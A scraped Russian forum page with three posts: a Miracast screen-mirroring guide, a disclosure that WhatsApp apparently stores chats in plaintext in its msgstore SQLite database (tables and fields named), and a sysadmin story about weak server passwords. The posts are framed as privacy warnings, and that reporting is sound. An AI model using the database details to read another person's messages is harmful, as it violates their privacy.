Трансляция экрана телефона на Android на компьютер на Windows 10. Android, Windows, Windows 10, Гайд, Инструкция, Chromecast, Miracast, Длиннопост

Выбираем "Соединиться" на открывшейся вкладке.

Трансляция экрана телефона на Android на компьютер на Windows 10. Android, Windows, Windows 10, Гайд, Инструкция, Chromecast, Miracast, Длиннопост

Выбираем "Проецирование на этот компьютер" в следующем диалоге.

Трансляция экрана телефона на Android на компьютер на Windows 10. Android, Windows, Windows 10, Гайд, Инструкция, Chromecast, Miracast, Длиннопост

Откроется меню настройки проецирования. Лично я рекомендую настроить как показано на скриншоте ниже.

Трансляция экрана телефона на Android на компьютер на Windows 10. Android, Windows, Windows 10, Гайд, Инструкция, Chromecast, Miracast, Длиннопост

Более подробно о выбранных опциях по порядку:

- Когда будет активен режим приёма трансляций. Всегда, никогда, только в защищённых сетях. Последний вариант исключает публичные точки Wi-Fi без пароля.

- Пин-код будет запрашиваться каждый раз при подключении. Можно выбрать "только первый раз", после которого устройства смогут транслировать экран только один раз запросив пин-код.

- Галочка наличия пин-кода.

- Разрешать трансляции только есть ноут работает от сети. На компьютерах этой опции нет. Удобно включить для экономии батареи.


С компьютерной частью разобрались. Приступаем к телефонной. Необходимо найти меню подключения к беспроводному дисплею. В разных версиях android и разных сборках оно может называться по разному. Варианты: WiDi, Wi-Fi Display, Play to, Translate, либо как на скрине ниже - Smart View. Иконка - обычно нечто похожее на телевизор и значёк Wi-Fi или стрелка. Обычно прячется в меню действий, которое открывается свайпом двумя пальцами от верха экрана вниз. Однако бывает такое, что прячется в настройках телефона. Или как отдельный пункт меню, или как опция в настройках Wi-Fi.

Трансляция экрана телефона на Android на компьютер на Windows 10. Android, Windows, Windows 10, Гайд, Инструкция, Chromecast, Miracast, Длиннопост

При выборе начнётся сканирование сети на предмет наличия беспроводных экранов. При этом смартфон должен найти ноут/комп, как показано ниже:

Трансляция экрана телефона на Android на компьютер на Windows 10. Android, Windows, Windows 10, Гайд, Инструкция, Chromecast, Miracast, Длиннопост

Выбираем нужное устройство. Откроется диалог на ввод пин-кода. На смарте это будет выглядеть примерно так:

Трансляция экрана телефона на Android на компьютер на Windows 10. Android, Windows, Windows 10, Гайд, Инструкция, Chromecast, Miracast, Длиннопост

Одновременно с этим, на экране компьютера должно показаться уведомление, что "Телефон с таким-то именем хочет начать проецирование".

Трансляция экрана телефона на Android на компьютер на Windows 10. Android, Windows, Windows 10, Гайд, Инструкция, Chromecast, Miracast, Длиннопост

Принимаем запрос со стороны компьютера. Откроется окно с пин-кодом на весь экран.

Трансляция экрана телефона на Android на компьютер на Windows 10. Android, Windows, Windows 10, Гайд, Инструкция, Chromecast, Miracast, Длиннопост

Вводим пин-код на телефоне, ждём несколько секунд и наблюдаем копию экрана смартфона на компьютере.

Трансляция экрана телефона на Android на компьютер на Windows 10. Android, Windows, Windows 10, Гайд, Инструкция, Chromecast, Miracast, Длиннопост

К сожалению данный метод подходит только для трансляции видео или фото. Ну или для показа презентаций. Дело в том, что картинка запаздывает на 0.5 секунды. Звуковая дорожка, при трансляции видео, чуть сдвигается по времени. В итоге видео воспроизводится корректно. А вот в игры уже не поиграть. В тех же шуттерах/гонках, для которых смартфон можно использовать как контроллер, задержка в полсекунды весьма критична.


Прошу подписчиков не пинать за редкие посты - пишу по мере появления чего то интересного.

Показать полностью 9
1296

Whatsapp хранит переписку на смартфоне в открытом виде

Disclaimer:
Пост несёт сугубо информативно-познавательный характер, не несёт в себе призывов к действию. За рейтингом не гонюсь, можете минусить, но советую сначала прочесть
Однажды, почти случайно, залез я посмотреть что хранит Whatsapp в своих базах данных на смартфоне. Изначально цель была не эта, но потом стало интересно.

Мой смартфон — на андроиде. Поскольку есть рут и я не боюсь экспериментов над своим девайсом, мне не составляет труда изредка пользоваться приложением, название которого я не назову :) Во-первых, это может спровоцировать кого-то на неразумные действия в чей-то адрес, а такую ответственность брать на себя мне не хочется, а во-вторых, пикабушники люто не одобряют рекламные (либо похожие на таковые) посты.

Приложение позволяет на рутованном андроиде включать и отключать разные компоненты других приложений, например, выключить активность ("окно"), которое отображает полноэкранную рекламу, либо выключить сервис, в фоне отправляющий какую-то инфу чёрт знает кому. А также даёт просматривать и изменять хранимые другими приложениями данные в их базах данных.

В андроиде есть встроенный механизм баз данных (на движке SQLite). Мулечка в том, что любое приложение может иметь БД в защищённом хранилище системы, где будет накапливать и хранить свои данные. Это если на пальцах объяснять, более опытные разработчики могут внести дополнения в комментах.

Я не силён в шифрованиях, устройстве мессенджеров и шизой на тему информационной безопасности не страдаю. Однако обнаружил любопытную вещь.

После появления Телеграма, Whatsapp начал хвастаться сквозным шифрованием. Даже если оно есть по факту и работает, то почему в БД этого месссенджера хранятся все данные в открытом виде и никак (от слова совсем) не зашифрованы?

Отправляю тестовое сообщение:
Whatsapp хранит переписку на смартфоне в открытом виде Android, Whatsapp, Мессенджер, Telegram, База данных, Безопасность, Информационная безопасность, Шифрование, Длиннопост

Смотрю в базу (БД msgstore, таблица messages):

Whatsapp хранит переписку на смартфоне в открытом виде Android, Whatsapp, Мессенджер, Telegram, База данных, Безопасность, Информационная безопасность, Шифрование, Длиннопост

Список всех баз данных:

Whatsapp хранит переписку на смартфоне в открытом виде Android, Whatsapp, Мессенджер, Telegram, База данных, Безопасность, Информационная безопасность, Шифрование, Длиннопост

Там хранятся различные настройки, которые в рамках данного поста неинтересны.

Список всех таблиц самой интересной БД msgstore:

Whatsapp хранит переписку на смартфоне в открытом виде Android, Whatsapp, Мессенджер, Telegram, База данных, Безопасность, Информационная безопасность, Шифрование, Длиннопост
Whatsapp хранит переписку на смартфоне в открытом виде Android, Whatsapp, Мессенджер, Telegram, База данных, Безопасность, Информационная безопасность, Шифрование, Длиннопост

Если вкратце, тут хранятся служебные данные о чатах, местоположениях и всяком таком.
В том числе — сами переписки.

Список чатов (таблица chat_list). Это тот список контактов, с которыми у вас уже начато общение, и который вы видите в первую очередь, открывая приложение.

Whatsapp хранит переписку на смартфоне в открытом виде Android, Whatsapp, Мессенджер, Telegram, База данных, Безопасность, Информационная безопасность, Шифрование, Длиннопост

Ещё раз покажу таблицу messages — список всех сообщений.

Отображается ИД собеседника (поле key_remote_jid, значения включают номер телефона), само сообщение в открытом виде (data), Unix-метка даты сообщения (timestamp), прямая ссылка на медиа-контент (адрес ведёт на сервера Whatsapp; поле media_url), подпись к медиа-контенту в открытом виде (к фотографии, например; поле media_caption)и много чего ещё.

Whatsapp хранит переписку на смартфоне в открытом виде Android, Whatsapp, Мессенджер, Telegram, База данных, Безопасность, Информационная безопасность, Шифрование, Длиннопост

Поле data пустое там, где вместо чистого текста отправлено, например, фото или состоялся звонок.

Whatsapp хранит переписку на смартфоне в открытом виде Android, Whatsapp, Мессенджер, Telegram, База данных, Безопасность, Информационная безопасность, Шифрование, Длиннопост

Ссылка на медиа примерно следующая:https://mmi652.whatsapp.net/d/кучарандомныхсимволов/кучадруг...
Эту ссылку можно открыть в браузере. Если она действительна, то скачивается файл file.enc, который, к счастью, зашифрован: это может быть фото, аудио, видео, что угодно ещё. Если ссылка оказывается недействительной, то в браузере ответом будет строка Media object not found.

Ниже таблица messages_fts_content (есть ещё аналогичная messages_fts). Тут тоже сообщения, и они тоже в открытом виде. Предназначение таблицы мне непонятно, ибо детально не разбирался.

Whatsapp хранит переписку на смартфоне в открытом виде Android, Whatsapp, Мессенджер, Telegram, База данных, Безопасность, Информационная безопасность, Шифрование, Длиннопост

Чем это опасно?

Если смартфон попадёт в руки опытного и знающего подлеца, получить все ваши переписки в Whatsapp ему не составит никакого труда. Вообще никакого. Защищены только медиафайлы, которые зашифрованы и хранятся на серверах WA.

К слову, для тех, кто не в курсе: это объясняет тот факт, что после удаления папки Whatsapp из памяти телефона, где хранится кеш фотографий, зашифрованные бекапы чатов и прочее, медиа-контент заново выкачивается при открытии чата.

Послесловие
На закуску — вот что хранит Telegram. Одна БД, предназначенная для сбора статистики об использовании приложения для отправки в Google. И все таблицы этой БД пусты!

Whatsapp хранит переписку на смартфоне в открытом виде Android, Whatsapp, Мессенджер, Telegram, База данных, Безопасность, Информационная безопасность, Шифрование, Длиннопост

Может быть, это общеизвестный факт в кругах (около)айтишников, но знать об этом надо каждому. Подумайте, прежде чем отдавать смартфон, например, в сервисный центр (увы, там часто работают нездоровые идиоты) или подпускать к нему идиота типа меня :)

Всем добра!

БМ сходил с ума от скриншотов.

Показать полностью 9
143

Псевдо защита от "плаксы"

На волне шумихи вокруг WannaCry появились "доброхоты" якобы помогающие защититься от новомодного вируса.
Сейчас как раз восстанавливаю последствия "паранои" и "псевдо-защиты" от "плаксы".....
Девочке рекламный баннер написал, что нужно защититься от вируса и она согласилась - ей поставили некую "чистилку" и "аваст" - после этого доступ к сетевым папкам пропал как класс...
Откатился на предыдущую точку восстановления и все снова заработало! ;)

Псевдо защита от "плаксы" Wannacry, Linux и Windows, Linux, Windows, Информационная безопасность, Сисадмин, Взлом, Компьютерные сети

Заодно решил проверить всю Сервисную сеть на уязвимости и к сожалению нашёл несколько Windows Server 2000 и 2003 с рядом уязвимостей, среди которых был сервер отвечающий за телефонию, на котором "админ" VoIP додумался в качестве Админской учётки использовать связку логин/пароль 1111, а на других серверах его зоны ответственности был чуть более секьюрный логин "Администратор" и пароль "12345678". Разговоры с этим недо-админом и нашим начальством ни к чему хорошему не привели, кроме того, что мне сделали выговор, что я полез в чужие сервера и оклеветал классного специалиста, гордость конторы и семьянина воспитывающего маленького ребёнка...

Псевдо защита от "плаксы" Wannacry, Linux и Windows, Linux, Windows, Информационная безопасность, Сисадмин, Взлом, Компьютерные сети
Показать полностью 1
Похожие посты закончились. Возможно, вас заинтересуют другие посты по тегам: